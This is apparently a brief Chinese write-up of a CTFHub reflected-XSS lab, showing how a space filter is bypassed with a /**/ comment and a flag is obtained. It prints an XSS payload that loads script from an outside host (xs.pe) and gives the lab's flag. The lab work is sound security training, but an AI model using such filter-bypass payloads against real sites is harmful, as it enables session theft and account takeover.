开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题
在第一个输入框中输入:
<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理
用/**/绕过:
<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>
提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:


成功得到flag:
ctfhub{5f10e129d697165a8083b5be}